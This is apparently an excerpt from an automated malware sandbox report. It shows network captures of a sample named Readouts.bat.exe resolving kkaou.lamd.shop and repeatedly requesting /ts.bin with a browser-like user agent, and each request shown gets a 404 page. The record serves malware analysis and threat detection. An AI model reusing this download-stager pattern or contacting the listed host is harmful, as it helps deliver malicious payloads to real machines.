                                              Nov 25, 2024 07:11:05.155090094 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:05.270195007 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:05.389790058 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:05.656116962 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:05.656174898 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:05.770287037 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:05.889818907 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:06.156219006 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:06.156424999 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:06.270925045 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:06.390475988 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:06.657069921 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:06.657181025 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:06.770426035 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:06.890002966 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:07.158606052 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:07.158737898 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:07.350207090 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:07.350264072 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:07.457627058 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:07.577147007 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:07.843770027 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:07.843878984 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:07.959292889 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:08.078799963 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:08.345781088 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:08.347100973 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:08.457787991 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:08.577352047 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:08.843736887 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:08.843842030 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:09.035659075 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:09.035742044 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:09.145149946 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:09.264647007 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:09.532974958 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:09.533122063 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:09.647196054 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:09.766845942 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:10.033322096 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:10.033404112 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:10.146238089 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:10.265810013 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:10.532082081 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:10.533338070 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:10.645879030 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:10.956330061 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:11.120078087 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:11.120196104 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:11.120969057 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:11.121311903 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:11.387598991 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:11.387665033 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:11.514283895 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:11.633801937 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:11.900319099 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:11.900403976 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:12.020796061 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:12.140239954 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:12.406930923 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:12.407056093 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:12.520155907 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:12.639659882 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:12.908046007 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:12.908279896 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:13.020324945 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:13.139892101 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:13.407478094 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:13.407572985 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:13.520366907 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:13.639800072 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:13.907073021 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:13.907181978 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:14.020242929 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:14.139811993 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:14.405982018 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:14.406156063 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:14.520242929 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:14.639801979 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:14.906061888 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:14.906136036 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:15.020354033 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:15.139868975 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:15.406105042 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:15.406183958 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:15.520715952 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:15.640211105 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:15.907605886 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:15.907687902 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:16.099591017 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:16.099706888 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:16.207920074 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:16.327438116 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:16.593772888 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:16.593836069 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:16.711572886 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:16.831078053 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:17.097598076 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:17.097668886 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:17.208091021 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:17.327662945 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:17.594261885 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:17.594389915 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:17.708781004 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:17.828310966 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:18.094583988 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:18.094773054 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:18.207731009 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:18.327337027 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:18.593561888 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:18.593749046 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:18.707848072 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:18.827308893 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:19.093539000 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:19.093740940 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:19.207875967 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:19.327533960 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:19.593852997 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:19.593972921 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:19.711421967 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:19.830956936 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:20.108227015 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:20.111587048 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:20.223490000 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:20.343033075 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:20.613784075 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:20.615394115 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:20.723654985 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:20.843101978 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:21.109558105 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:21.109632015 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:21.223464966 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:21.343089104 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:21.609508038 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:21.609591007 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:21.723721981 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:21.843559980 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:22.109802961 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:22.109946966 CET4983480192.168.2.7172.93.121.126
                                              Nov 25, 2024 07:11:22.301501989 CET8049834172.93.121.126192.168.2.7
                                              Nov 25, 2024 07:11:22.301580906 CET4983480192.168.2.7172.93.121.126

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 25, 2024 07:10:13.649945021 CET5905053192.168.2.71.1.1.1
                                              Nov 25, 2024 07:10:14.029073954 CET53590501.1.1.1192.168.2.7

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Nov 25, 2024 07:10:13.649945021 CET192.168.2.71.1.1.10xa3cbStandard query (0)kkaou.lamd.shopA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Nov 25, 2024 07:09:13.344655991 CET1.1.1.1192.168.2.70xb503No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                              Nov 25, 2024 07:09:13.344655991 CET1.1.1.1192.168.2.70xb503No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                              Nov 25, 2024 07:10:14.029073954 CET1.1.1.1192.168.2.70xa3cbNo error (0)kkaou.lamd.shop172.93.121.126A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • kkaou.lamd.shop

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.749834172.93.121.126807840C:\Users\user\Desktop\Readouts.bat.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 25, 2024 07:10:14.168566942 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:15.414000988 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:00 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:10:15.656476021 CET315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while t
                                              Nov 25, 2024 07:10:15.770201921 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:16.425268888 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:01 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:16.535634041 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:16.537261963 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:01 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:16.924293041 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:02 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:17.035450935 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:17.433568001 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:02 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:17.551203012 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:17.937314034 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:03 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:18.051119089 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:18.443531036 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:03 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:18.553822041 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:18.939944029 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:04 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
